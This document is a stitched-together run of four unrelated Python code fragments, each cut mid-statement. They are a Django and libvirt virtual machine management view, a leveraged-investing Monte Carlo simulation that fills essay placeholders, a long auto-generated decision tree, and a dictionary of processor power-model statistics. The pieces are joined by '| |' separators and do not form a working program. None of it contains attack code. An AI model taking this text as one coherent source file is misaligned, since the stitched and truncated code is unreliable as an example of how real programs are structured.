"strokeColor": "rgba(241,72,70,1)",
"pointColor": "rgba(241,72,70,1)",
"pointStrokeColor": "#fff",
"data": datasets
}
]
}
for i, net in enumerate(networks):
datasets_rx = [0] * 10
datasets_tx = [0] * 10
network = {
'labels': [""] * 10,
'datasets': [
{
"fillColor": "rgba(83,191,189,0.5)",
"strokeColor": "rgba(83,191,189,1)",
"pointColor": "rgba(83,191,189,1)",
"pointStrokeColor": "#fff",
"data": datasets_rx
},
{
"fillColor": "rgba(151,187,205,0.5)",
"strokeColor": "rgba(151,187,205,1)",
"pointColor": "rgba(151,187,205,1)",
"pointStrokeColor": "#fff",
"data": datasets_tx
},
]
}
json_net.append({'dev': i, 'data': network})
for blk in disks:
datasets_wr = [0] * 10
datasets_rd = [0] * 10
disk = {
'labels': [""] * 10,
'datasets': [
{
"fillColor": "rgba(83,191,189,0.5)",
"strokeColor": "rgba(83,191,189,1)",
"pointColor": "rgba(83,191,189,1)",
"pointStrokeColor": "#fff",
"data": datasets_rd
},
{
"fillColor": "rgba(249,134,33,0.5)",
"strokeColor": "rgba(249,134,33,1)",
"pointColor": "rgba(249,134,33,1)",
"pointStrokeColor": "#fff",
"data": datasets_wr
},
]
}
json_blk.append({'dev': blk['dev'], 'data': disk})
data = json.dumps({'status': status, 'cpu': cpu, 'hdd': json_blk, 'net': json_net})
response = HttpResponse()
response['Content-Type'] = "text/javascript"
if status == 1:
response.cookies['cpu'] = datasets['cpu']
response.cookies['hdd'] = cookie_blk
response.cookies['net'] = cookie_net
response.write(data)
return response
def insts_status(request, host_id):
"""
Instances block
"""
errors = []
instances = []
compute = Compute.objects.get(id=host_id)
try:
conn = wvmInstances(compute.hostname,
compute.login,
compute.password,
compute.type)
get_instances = conn.get_instances()
except libvirtError as err:
errors.append(err)
for instance in get_instances:
instances.append({'name': instance,
'status': conn.get_instance_status(instance),
'memory': conn.get_instance_memory(instance),
'vcpu': conn.get_instance_vcpu(instance),
'uuid': conn.get_uuid(instance),
'host': host_id,
'dump': conn.get_instance_managed_save_image(instance)
})
data = json.dumps(instances)
response = HttpResponse()
response['Content-Type'] = "text/javascript"
response.write(data)
return response
def instances(request, host_id):
"""
Instances block
"""
errors = []
instances = []
time_refresh = 8000
get_instances = []
conn = None
compute = Compute.objects.get(id=host_id)
try:
conn = wvmInstances(compute.hostname,
compute.login,
compute.password,
compute.type)
except libvirtError as err:
errors.append(err)
if conn:
try:
if request.method == 'POST':
name = request.POST.get('name', '')
if 'start' in request.POST:
conn.start(name)
return HttpResponseRedirect(request.get_full_path())
if 'shutdown' in request.POST:
conn.shutdown(name)
return HttpResponseRedirect(request.get_full_path())
if 'destroy' in request.POST:
conn.force_shutdown(name)
return HttpResponseRedirect(request.get_full_path())
if 'managedsave' in request.POST:
conn.managedsave(name)
return HttpResponseRedirect(request.get_full_path())
if 'deletesaveimage' in request.POST:
conn.managed_save_remove(name)
return HttpResponseRedirect(request.get_full_path())
if 'suspend' in request.POST:
conn.suspend(name)
return HttpResponseRedirect(request.get_full_path())
if 'resume' in request.POST:
conn.resume(name)
return HttpResponseRedirect(request.get_full_path())
conn.close()
except libvirtError as err:
errors.append(err)
get_instances = conn.get_instances()
for instance in get_instances:
try:
inst = Instance.objects.get(compute_id=host_id, name=instance)
uuid = inst.uuid
except Instance.DoesNotExist:
uuid = conn.get_uuid(instance)
inst = Instance(compute_id=host_id, name=instance, uuid=uuid)
inst.save()
conn2 = wvmInstance(compute.hostname,
compute.login,
compute.password,
compute.type,
instance)
instances.append({'name': instance,
'status': conn.get_instance_status(instance),
'uuid': uuid,
'memory': conn.get_instance_memory(instance),
'description': conn2.get_description(),
'vcpu': conn.get_instance_vcpu(instance),
'storage': conn2.get_disk_device(),
'has_managed_save_image': conn.get_instance_managed_save_image(instance)})
conn2.close()
object = {
'response': {
'instances': instances
},
'errors': [str(error) for error in errors]
}
return render(object, 'instances.html', locals(), request)
def instance_status(request):
payload = json.loads(request.body)
machines = []
def query_hypervisor(hostnames, host_id):
compute = Compute.objects.get(id=host_id)
object = {}
def query_machine(hostname):
try:
conn = wvmInstance(compute.hostname,
compute.login,
compute.password,
compute.type, hostname)
object[hostname] = {
'status': conn.get_status(),
'cur_memory': conn.get_cur_memory(),
'disks': conn.get_disk_device(),
'vcpu': conn.get_vcpu()
}
except libvirtError:
status = None
pool = WorkerPool(min(len(hostnames), 20))
for hostname in hostnames:
pool.add_task(query_machine, hostname)
pool.run_tasks()
for key in object:
val = object[key]
val['hostname'] = key
val['hypervisor_id'] = host_id
machines.append(val)
pool = WorkerPool(min(len(payload), 10))
for host_id in payload:
pool.add_task(query_hypervisor, payload[host_id], host_id)
pool.run_tasks()
return render({'response': {'machines': machines}}, 'instance.html', locals(), request)
def instance(request, host_id, vname):
errors = []
messages = []
time_refresh = TIME_JS_REFRESH
compute = Compute.objects.get(id=host_id)
computes = Compute.objects.all()
computes_count = len(computes)
keymaps = QEMU_KEYMAPS
try:
conn = wvmInstance(compute.hostname,
compute.login,
compute.password,
compute.type,
vname)
except libvirtError as err:
errors.append(err)
try:
if request.method == 'POST':
if 'start' in request.POST:
conn.start()
return HttpResponseRedirect(request.get_full_path() + '#shutdown')
if 'power' in request.POST:
if 'shutdown' == request.POST.get('power', ''):
conn.shutdown()
return HttpResponseRedirect(request.get_full_path() + '#shutdown')
if 'destroy' == request.POST.get('power', ''):
conn.force_shutdown()
return HttpResponseRedirect(request.get_full_path() + '#forceshutdown')
if 'managedsave' == request.POST.get('power', ''):
conn.managedsave()
return HttpResponseRedirect(request.get_full_path() + '#managedsave')
if 'shutdown' in request.POST:
conn.shutdown()
return HttpResponseRedirect(request.get_full_path() + '#shutdown')
if 'destroy' in request.POST:
conn.force_shutdown()
return HttpResponseRedirect(request.get_full_path() + '#forceshutdown')
if 'managedsave' in request.POST:
conn.managedsave()
return HttpResponseRedirect(request.get_full_path() + '#managedsave')
if 'deletesaveimage' in request.POST:
conn.managed_save_remove()
return HttpResponseRedirect(request.get_full_path() + '#managedsave')
if 'suspend' in request.POST:
conn.suspend()
return HttpResponseRedirect(request.get_full_path() + '#suspend')
if 'resume' in request.POST:
conn.resume()
return HttpResponseRedirect(request.get_full_path() + '#suspend')
if 'delete' in request.POST:
if conn.get_status() == 1:
conn.force_shutdown()
if request.POST.get('delete_disk', ''):
conn.delete_disk()
conn.delete()
return HttpResponseRedirect('/%s/instances' % host_id)
if 'assign_volume' in request.POST:
file = request.POST.get('file', | |
3.0] # only check ratios that are feasible for buying leveraged ETFs (i.e., there are only 2X and 3X funds)
param_sweep_function = lambda use_sat_utility, utility_param: param_sweep_exp_util_M_t( \
THETA_VALUES_FOR_SWEEP, default_market.annual_margin_interest_rate, \
default_market.annual_mu, default_investor.years_until_donate, \
LEV_ETF_EXP_RATIO, C_VALUES_FOR_SWEEP, default_market.annual_sigma, \
NUM_SAMPLES_FROM_M_T_DISTRIBUTION, use_sat_utility, utility_param)
# regular utility
for alpha in [".01", ".25", ".5", ".75", ".9", ".99"]:
print "Getting optimal theta and c for alpha = %s" % alpha
(theta_of_optimum, c_of_optimum, max_exp_util) = param_sweep_function( \
False, float(alpha))
output_text = output_text.replace(REPLACE_STR_FRONT + "optimal_theta_for_alpha=%s" % alpha + REPLACE_STR_END,
str(round(theta_of_optimum,2)))
output_text = output_text.replace(REPLACE_STR_FRONT + "optimal_c_for_alpha=%s" % alpha + REPLACE_STR_END,
str(round(c_of_optimum,2)))
output_text = output_text.replace(REPLACE_STR_FRONT + "exp_util_for_alpha=%s" % alpha + REPLACE_STR_END,
str(round(max_exp_util,2)))
# saturation utility
for saturation_cutoff in ["$500K", "$2 million", "$20 million"]:
print "Getting optimal theta and c for saturation cutoff = %s" % saturation_cutoff
if saturation_cutoff is "$500K":
saturation_as_number = 500000.0
elif saturation_cutoff is "$2 million":
saturation_as_number = 2000000.0
elif saturation_cutoff is "$20 million":
saturation_as_number = 20000000.0
else:
raise Exception("Not a valid saturation-cutoff string")
(theta_of_optimum, c_of_optimum, max_exp_util) = param_sweep_function( \
True, saturation_as_number)
output_text = output_text.replace(REPLACE_STR_FRONT + "optimal_theta_for_cutoff=%s" % saturation_cutoff + REPLACE_STR_END,
str(round(theta_of_optimum,2)))
output_text = output_text.replace(REPLACE_STR_FRONT + "optimal_c_for_cutoff=%s" % saturation_cutoff + REPLACE_STR_END,
str(round(c_of_optimum,2)))
output_text = output_text.replace(REPLACE_STR_FRONT + "exp_util_for_cutoff=%s" % saturation_cutoff + REPLACE_STR_END,
str(round(max_exp_util,2)))
return output_text
def param_sweep_exp_util_M_t(theta_values_to_sweep, r, mu, t, f,
c_values_to_sweep, sigma, num_samples,
use_sat_utility, utility_param):
if use_sat_utility:
utility_function = lambda wealth: util.saturation_utility(wealth, utility_param)
else:
utility_function = lambda wealth: util.utility(wealth, utility_param)
theta_of_optimum = -9999 # junk
c_of_optimum = -9999 # junk
max_exp_util_so_far = -99999 # junk
INITIAL_INVESTMENT = 100000.0
assert INITIAL_INVESTMENT == 100000.0, "The value 100000.0 is hard-coded into the writeup HTML text."
for theta in theta_values_to_sweep:
for c in c_values_to_sweep:
M_t_samples = INITIAL_INVESTMENT * sample_M_t_distribution(theta, r, mu, t, f, c, sigma, num_samples)
utility_values = map(utility_function, M_t_samples)
exp_util = numpy.average(utility_values)
if exp_util > max_exp_util_so_far:
theta_of_optimum = theta
c_of_optimum = c
max_exp_util_so_far = exp_util
return (theta_of_optimum, c_of_optimum, max_exp_util_so_far)
def sample_M_t_distribution(theta, r, mu, t, f, c, sigma, num_samples):
assert theta >= 0 and theta <= 1, "theta isn't in [0,1]"
leveraged_location_param = (r + (mu-r)*c) * t - f * t - c**2 * sigma**2 * t/2
leveraged_scale_param = c * sigma * math.sqrt(t)
leveraged_part = numpy.random.lognormal(leveraged_location_param, \
leveraged_scale_param, num_samples)
regular_location_param = mu * t - sigma**2 * t/2
regular_scale_param = sigma * math.sqrt(t)
regular_part = numpy.random.lognormal(regular_location_param, \
regular_scale_param, num_samples)
return theta * leveraged_part + (1.0-theta) * regular_part
def c_star(alpha, custom_mu=None):
"""c* is optimal leverage. alpha is as in utility(wealth) = wealth^alpha"""
if custom_mu:
market = Market.Market(annual_mu=custom_mu)
else:
market = Market.Market()
return (market.annual_mu - market.annual_margin_interest_rate) / \
( market.annual_sigma**2 * (1-alpha) )
"""
DON'T NEED THIS ANYMORE
def throw_out_alphas_where_c_star_is_extreme(alpha_values, c_star_values):
assert len(alpha_values) == len(c_star_values), "Arrays aren't the same size."
assert len(c_star_values) > 5, "This might not work so well for small alpha arrays."
middle_of_c_star_array = len(c_star_values)/2
typical_c_star = c_star_values[middle_of_c_star_array]
MULTIPLE_WHEN_TOO_EXTREME = 10
non_extreme_alphas_and_c_stars = [(alpha, c_star) for (alpha, c_star) in zip(alpha_values, c_star_values) if abs(c_star) <= MULTIPLE_WHEN_TOO_EXTREME * abs(typical_c_star)]
non_extreme_alphas = [alpha for (alpha, c_star) in non_extreme_alphas_and_c_stars]
non_extreme_c_stars = [c_star for (alpha, c_star) in non_extreme_alphas_and_c_stars]
return (non_extreme_alphas, non_extreme_c_stars)
def solve_deriv_wrt_c_equals_zero(alpha):
deriv_with_this_alpha = lambda c : deriv_wrt_c(c,alpha)
GUESS = 1.0
solution = fsolve(deriv_with_this_alpha, GUESS)
assert len(solution) == 1, "Solution array has length other than 1."
return solution[0]
def deriv_wrt_c(c, alpha):
default_investor = Investor.Investor()
default_market = Market.Market()
return math.exp( (default_market.annual_margin_interest_rate + (default_market.annual_mu-default_market.annual_margin_interest_rate) * c) * default_investor.years_until_donate * alpha + (default_market.annual_sigma**2 * c**2/2.0) * default_investor.years_until_donate * (alpha**2 - alpha) ) * ( (default_market.annual_mu-default_market.annual_margin_interest_rate) * default_investor.years_until_donate * alpha + c*default_market.annual_sigma**2 * default_investor.years_until_donate * (alpha**2 - alpha) )
"""
def add_theoretical_calculations_for_no_unemployment_etc(output_text, no_unemployment_etc_results_table_contents):
default_investor = Investor.Investor()
default_market = Market.Market()
# initial investment for the "no complications" runs
one_month_pay = default_investor.initial_annual_income_for_investing * \
(float(margin_leverage.INTEREST_AND_SALARY_EVERY_NUM_DAYS) / \
margin_leverage.DAYS_PER_YEAR)
output_text = output_text.replace(REPLACE_STR_FRONT + "one_month_pay" + REPLACE_STR_END,
util.format_as_dollar_string(one_month_pay))
# Theoretical vs. actual median
theoretical_median_PV_ignoring_complications = one_month_pay * math.exp(-default_market.annual_sigma**2*default_investor.years_until_donate/2)
output_text = output_text.replace(REPLACE_STR_FRONT + "theoretical_median_PV_ignoring_complications" + REPLACE_STR_END,
util.format_as_dollar_string(theoretical_median_PV_ignoring_complications))
actual_median_string = parse_value_from_results_table(no_unemployment_etc_results_table_contents, "Regular","Median")
output_text = output_text.replace(REPLACE_STR_FRONT + "actual_median_ignoring_complications" + REPLACE_STR_END,
actual_median_string)
# Theoretical vs. actual mean
theoretical_mean_PV_ignoring_complications = one_month_pay
output_text = output_text.replace(REPLACE_STR_FRONT + "theoretical_mean_PV_ignoring_complications" + REPLACE_STR_END,
util.format_as_dollar_string(theoretical_mean_PV_ignoring_complications))
actual_mean_string = parse_value_from_results_table(no_unemployment_etc_results_table_contents, "Regular","Mean ± stderr")
output_text = output_text.replace(REPLACE_STR_FRONT + "actual_mean_ignoring_complications" + REPLACE_STR_END,
actual_mean_string)
# sigma_{ln(wealth)}
actual_sigma_of_log_wealth = parse_value_from_results_table(no_unemployment_etc_results_table_contents, "Regular","σ<sub>ln(wealth)</sub>")
output_text = output_text.replace(REPLACE_STR_FRONT + "actual_sigma_of_log_wealth" + REPLACE_STR_END,
actual_sigma_of_log_wealth)
# leverage amount, c
broker_imposed_leverage_limit = util.max_margin_to_assets_ratio_to_N_to_1_leverage(default_investor.broker_max_margin_to_assets_ratio)
output_text = output_text.replace(REPLACE_STR_FRONT + "broker_imposed_leverage_limit" + REPLACE_STR_END,
str(round(broker_imposed_leverage_limit,1)))
# Theoretical vs. actual median for leveraged
leveraged_theoretical_median_PV_ignoring_complications = one_month_pay *\
math.exp( (default_market.annual_mu-default_market.annual_margin_interest_rate) * \
(broker_imposed_leverage_limit-1.0) * default_investor.years_until_donate - \
broker_imposed_leverage_limit**2 * default_market.annual_sigma**2 * \
default_investor.years_until_donate/2)
output_text = output_text.replace(REPLACE_STR_FRONT + "leveraged_theoretical_median_PV_ignoring_complications" + REPLACE_STR_END,
util.format_as_dollar_string(leveraged_theoretical_median_PV_ignoring_complications))
leveraged_actual_median_string = parse_value_from_results_table(no_unemployment_etc_results_table_contents, "Margin","Median")
output_text = output_text.replace(REPLACE_STR_FRONT + "leveraged_actual_median_ignoring_complications" + REPLACE_STR_END,
leveraged_actual_median_string)
# Theoretical vs. actual mean for leveraged
leveraged_theoretical_mean_PV_ignoring_complications = one_month_pay * \
math.exp( (default_market.annual_mu-default_market.annual_margin_interest_rate) * \
(broker_imposed_leverage_limit-1.0) * default_investor.years_until_donate )
output_text = output_text.replace(REPLACE_STR_FRONT + "leveraged_theoretical_mean_PV_ignoring_complications" + REPLACE_STR_END,
util.format_as_dollar_string(leveraged_theoretical_mean_PV_ignoring_complications))
leveraged_actual_mean_string = parse_value_from_results_table(no_unemployment_etc_results_table_contents, "Margin","Mean ± stderr")
leveraged_actual_mean = get_mean_as_int_from_mean_plus_or_minus_stderr(leveraged_actual_mean_string)
output_text = output_text.replace(REPLACE_STR_FRONT + "leveraged_actual_mean_ignoring_complications" + REPLACE_STR_END,
leveraged_actual_mean_string)
# sigma_{ln(wealth)} for leveraged
leveraged_theoretical_sigma_ln_wealth = broker_imposed_leverage_limit * \
default_market.annual_sigma * math.sqrt(default_investor.years_until_donate)
output_text = output_text.replace(REPLACE_STR_FRONT + "leveraged_theoretical_sigma_ln_wealth" + REPLACE_STR_END,
str(round(leveraged_theoretical_sigma_ln_wealth,2)))
leveraged_actual_sigma_of_log_wealth = parse_value_from_results_table(no_unemployment_etc_results_table_contents, "Margin","σ<sub>ln(wealth)</sub>")
output_text = output_text.replace(REPLACE_STR_FRONT + "leveraged_actual_sigma_of_log_wealth" + REPLACE_STR_END,
leveraged_actual_sigma_of_log_wealth)
# Z-value threshold
Z_value_threshold = math.sqrt(default_investor.years_until_donate) * \
((broker_imposed_leverage_limit+1)*default_market.annual_sigma/2 - \
(default_market.annual_mu - default_market.annual_margin_interest_rate) \
/ default_market.annual_sigma)
output_text = output_text.replace(REPLACE_STR_FRONT + "Z_value_threshold" + REPLACE_STR_END,
str(round(Z_value_threshold,2)))
# Prob(Z <= threshold)
prob_Z_leq_threshold = norm.cdf(Z_value_threshold)
output_text = output_text.replace(REPLACE_STR_FRONT + "prob_Z_leq_threshold" + REPLACE_STR_END,
str(round(prob_Z_leq_threshold,2)))
# Prob(Z > threshold)
prob_Z_gt_threshold = 1.0-prob_Z_leq_threshold
output_text = output_text.replace(REPLACE_STR_FRONT + "prob_Z_gt_threshold" + REPLACE_STR_END,
str(round(prob_Z_gt_threshold,2)))
# Actual % times leverage is better
actual_percent_times_leverage_is_better = parse_percent_times_leverage_is_better(no_unemployment_etc_results_table_contents)
output_text = output_text.replace(REPLACE_STR_FRONT + "actual_percent_times_leverage_is_better" + REPLACE_STR_END,
actual_percent_times_leverage_is_better)
return output_text
"""
NOT USING THIS ANYMORE...
def theoretical_median_PV_ignoring_complications():
default_investor = Investor.Investor()
default_market = Market.Market()
initial_monthly_income = default_investor.initial_annual_income_for_investing / 12
total_PV = 0.0
for month in xrange(12 * default_investor.years_until_donate):
cur_monthly_income = initial_monthly_income * (1+default_investor.annual_real_income_growth_percent/100.0)**math.floor(month/12)
discounted_cur_monthly_income = cur_monthly_income * math.exp(- default_market.annual_mu * (month / 12.0))
total_PV += discounted_cur_monthly_income
return total_PV
"""
def add_figures(graph_type, output_text, current_location_of_figure,
cur_working_dir, use_local_image_file_paths, scenario_abbrev, timestamp):
placeholder_string_for_figure = REPLACE_STR_FRONT + "{}_{}".format(scenario_abbrev,graph_type) + REPLACE_STR_END
if re.search(".*{}.*".format(placeholder_string_for_figure), output_text): # if yes, this figure appears in the HTML, so we should copy it and write the path to the figure
# Copy the graph to be in the same folder as the essay HTML
new_figure_file_name = "{}_{}_{}.png".format(scenario_abbrev, graph_type, timestamp)
copy_destination_for_graph = os.path.join(cur_working_dir,new_figure_file_name)
if os.path.exists(current_location_of_figure):
shutil.copyfile(current_location_of_figure, copy_destination_for_graph)
# Replace the path to the optimal-leverage graph in the HTML file
if use_local_image_file_paths:
replacement_graph_path = copy_destination_for_graph
else: # use WordPress path that will exist once we upload the file
replacement_graph_path = get_WordPress_img_url_path(timestamp, new_figure_file_name)
output_text = output_text.replace(placeholder_string_for_figure, replacement_graph_path)
return output_text
def get_WordPress_img_url_path(timestamp, fig_name):
(year, month) = parse_year_and_month_from_timestamp(timestamp)
return "http://reducing-suffering.org/wp-content/uploads/{}/{}/{}".format(year, month, fig_name)
def parse_year_and_month_from_timestamp(timestamp):
"""Timestamp looks like 2015Apr26_23h09m36s. We want to parse out
2015 (the year) and 04 (the month)."""
parsed_time = time.strptime(timestamp, TIMESTAMP_FORMAT)
year = time.strftime('%Y',parsed_time)
month = time.strftime('%m',parsed_time)
return (year, month)
def how_much_better_is_margin(results_table_contents, column_name):
margin_val = get_mean_as_int_from_mean_plus_or_minus_stderr(parse_value_from_results_table(results_table_contents, "Margin", column_name))
regular_val = get_mean_as_int_from_mean_plus_or_minus_stderr(parse_value_from_results_table(results_table_contents, "Regular", column_name))
diff = margin_val-regular_val
percent_better = round( 100.0*diff/regular_val ,1)
return (diff, percent_better, float(margin_val), float(regular_val))
def get_mean_as_int_from_mean_plus_or_minus_stderr(input_string):
"""Convert something like '$37,343 ± $250' to 37343
This also works for medians."""
modified_string = input_string.replace("$","")
modified_string = modified_string.replace(",","")
values = modified_string.split()
return int(values[0])
def parse_value_from_results_table(results_table_contents, row_name, column_name):
NUM_COLUMNS = 6
regex_for_header_columns = "".join([" <td><i>(.+)</i></td>" for column in xrange(NUM_COLUMNS)])
regex_for_columns = regex_for_header_columns.replace("<i>","").replace("</i>","")
text = '.*<tr><td><i>{}</i></td>{}.*'.format(row_name, regex_for_columns)
matches = re.search(text, results_table_contents)
assert matches, "Didn't find a match for that row!"
header_text = '.*<tr><td><i>Type</i></td>{}.*'.format(regex_for_header_columns)
header_matches = re.search(header_text, results_table_contents)
assert header_matches, "Didn't match the header!"
cur_group_num = 1 # Start at 1 because group 0 has the whole match at once. From 1 on are the individual matches.
while cur_group_num <= NUM_COLUMNS:
cur_col_name = header_matches.group(cur_group_num)
if column_name == cur_col_name:
assert matches.group(cur_group_num), "This value is empty!"
return matches.group(cur_group_num)
cur_group_num += 1
raise Exception("No matching column found")
def parse_percent_times_leverage_is_better(results_table_contents):
matches = re.search(r".*Leverage is better than regular (\d+(\.\d)?)% of the time.*",results_table_contents)
assert matches, "Didn't find a match for % of times margin did better!"
return matches.group(1)
if __name__ == "__main__":
start_time = time.time()
#DATA_ALREADY_EXISTS_AND_HAS_THIS_TIMESTAMP = None
DATA_ALREADY_EXISTS_AND_HAS_THIS_TIMESTAMP = "2015May15_15h57m13s" # 1000 trials of everything; production-ready run
| |
25:
return 2
else:
return 4
else:
return 2
else:
if f4 <= 13:
if f4 <= 10:
if f4 <= 1:
return 2
else:
if f4 <= 6:
return 3
else:
if f4 <= 8:
return 2
else:
return 3
else:
return 2
else:
if f4 <= 30:
if f4 <= 27:
if f4 <= 23:
if f5 <= 10:
if f5 <= 1:
return 3
else:
if f4 <= 19:
if f4 <= 17:
return 3
else:
return 2
else:
return 3
else:
if f4 <= 22:
if f4 <= 18:
return 3
else:
if f4 <= 19:
return 2
else:
return 3
else:
return 3
else:
return 2
else:
return 3
else:
if f5 <= 21:
if f4 <= 31:
return 3
else:
return 2
else:
return 2
else:
if f4 <= 6:
if f4 <= 1:
if f5 <= 27:
return 2
else:
if f3 <= 22:
return 2
else:
return 3
else:
if f3 <= 19:
if f3 <= 17:
return 2
else:
return 3
else:
if f5 <= 18:
return 2
else:
return 0
else:
if f4 <= 19:
if f4 <= 18:
if f3 <= 25:
return 2
else:
if f3 <= 26:
return 3
else:
return 2
else:
if f5 <= 30:
return 2
else:
return 5
else:
if f3 <= 25:
if f4 <= 32:
if f3 <= 21:
if f4 <= 23:
if f3 <= 16:
return 3
else:
return 2
else:
return 2
else:
return 2
else:
if f3 <= 22:
return 2
else:
return 3
else:
if f3 <= 26:
return 3
else:
return 2
else:
if f5 <= 22:
if f3 <= 27:
if f3 <= 22:
if f3 <= 8:
if f5 <= 20:
return 3
else:
return 4
else:
if f6 <= 0:
if f7 <= 8:
return 2
else:
return 8
else:
if f4 <= 2:
return 2
else:
if f3 <= 16:
return 2
else:
if f4 <= 9:
if f4 <= 6:
return 2
else:
if f4 <= 8:
return 4
else:
return 3
else:
if f3 <= 17:
return 3
else:
return 2
else:
if f4 <= 30:
if f3 <= 26:
if f4 <= 9:
return 4
else:
return 0
else:
if f4 <= 14:
if f4 <= 13:
return 3
else:
return 4
else:
return 3
else:
return 4
else:
if f5 <= 3:
return 2
else:
if f4 <= 11:
if f4 <= 1:
return 2
else:
if f4 <= 9:
return 3
else:
return 2
else:
if f3 <= 28:
if f4 <= 20:
return 3
else:
return 2
else:
return 2
else:
if f8 <= 23:
if f3 <= 17:
if f3 <= 16:
if f4 <= 12:
return 2
else:
return 3
else:
if f6 <= 3:
if f7 <= 27:
if f7 <= 22:
if f8 <= 2:
if f7 <= 3:
return 7
else:
return 5
else:
return 5
else:
return 5
else:
return 5
else:
if f6 <= 11:
if f7 <= 21:
return 6
else:
if f7 <= 24:
if f8 <= 21:
return 7
else:
return 8
else:
return 6
else:
if f6 <= 25:
if f7 <= 22:
if f6 <= 12:
return 5
else:
return 6
else:
return 7
else:
if f7 <= 14:
return 6
else:
return 5
else:
return 2
else:
if f7 <= 3:
if f6 <= 2:
if f9 <= 9:
return 7
else:
if f9 <= 11:
return 8
else:
return 7
else:
return 6
else:
if f6 <= 2:
return 5
else:
if f6 <= 11:
if f4 <= 9:
return 2
else:
return 6
else:
if f3 <= 17:
return 5
else:
return 2
else:
if f1 <= 14:
if f2 <= 11:
if f4 <= 8:
if f4 <= 1:
if f6 <= 22:
if f5 <= 3:
if f7 <= 29:
if f6 <= 15:
return 2
else:
if f6 <= 20:
if f7 <= 14:
if f7 <= 12:
return 6
else:
return 7
else:
return 6
else:
return 4
else:
if f5 <= 2:
return 3
else:
return 7
else:
if f3 <= 19:
if f3 <= 17:
return 2
else:
if f7 <= 13:
if f7 <= 11:
return 3
else:
return 2
else:
return 3
else:
return 2
else:
if f3 <= 19:
if f5 <= 3:
if f5 <= 2:
return 3
else:
return 5
else:
return 3
else:
return 2
else:
if f4 <= 6:
return 2
else:
if f3 <= 17:
return 2
else:
if f6 <= 6:
if f6 <= 1:
if f5 <= 25:
if f5 <= 7:
return 5
else:
return 4
else:
return 5
else:
if f5 <= 17:
return 5
else:
return 4
else:
if f6 <= 8:
if f5 <= 29:
return 6
else:
return 5
else:
if f5 <= 26:
if f5 <= 16:
if f8 <= 13:
return 4
else:
return 5
else:
return 4
else:
return 4
else:
if f3 <= 18:
if f4 <= 12:
if f4 <= 11:
return 2
else:
return 3
else:
if f4 <= 32:
if f10 <= 0:
if f3 <= 17:
if f3 <= 15:
if f1 <= 13:
return 3
else:
return 2
else:
return 3
else:
return 2
else:
return 2
else:
return 2
else:
if f4 <= 23:
if f10 <= 0:
if f4 <= 11:
return 2
else:
if f4 <= 21:
if f3 <= 24:
if f3 <= 22:
return 2
else:
return 3
else:
return 2
else:
return 2
else:
return 2
else:
if f3 <= 24:
if f5 <= 17:
return 2
else:
if f5 <= 25:
return 4
else:
return 2
else:
if f5 <= 1:
return 4
else:
return 2
else:
if f3 <= 18:
if f3 <= 11:
if f3 <= 3:
if f3 <= 2:
return 2
else:
if f4 <= 20:
if f4 <= 10:
return 2
else:
if f4 <= 11:
return 2
else:
if f4 <= 18:
return 4
else:
return 2
else:
if f4 <= 32:
return 1
else:
return 2
else:
if f2 <= 12:
if f5 <= 17:
if f5 <= 14:
if f5 <= 1:
return 1
else:
if f3 <= 9:
return 2
else:
return 1
else:
return 1
else:
if f4 <= 18:
return 1
else:
return 2
else:
if f1 <= 13:
return 2
else:
return 1
else:
if f9 <= 0:
if f3 <= 17:
if f3 <= 15:
return 2
else:
if f2 <= 15:
if f3 <= 16:
return 2
else:
return 1
else:
return 2
else:
if f2 <= 15:
if f4 <= 19:
if f4 <= 18:
return 2
else:
return 1
else:
return 2
else:
return 2
else:
if f4 <= 26:
if f3 <= 17:
if f3 <= 16:
return 2
else:
if f2 <= 15:
return 1
else:
return 2
else:
return 2
else:
if f4 <= 31:
return 2
else:
if f3 <= 15:
return 5
else:
return 2
else:
if f3 <= 27:
if f3 <= 24:
if f3 <= 22:
if f2 <= 16:
if f6 <= 18:
return 1
else:
if f3 <= 20:
return 1
else:
if f9 <= 1:
return 1
else:
return 2
else:
if f1 <= 13:
return 2
else:
return 1
else:
return 2
else:
if f4 <= 9:
return 1
else:
if f3 <= 26:
if f3 <= 25:
return 1
else:
return 2
else:
return 1
else:
if f3 <= 30:
return 2
else:
return 3
else:
if f1 <= 16:
if f2 <= 18:
return 0
else:
if f1 <= 15:
if f2 <= 19:
if f5 <= 0:
return 0
else:
return 2
else:
| |
Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.496534,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 10.1286,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0205376,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.21882,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.110006,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.332358,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.536081,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
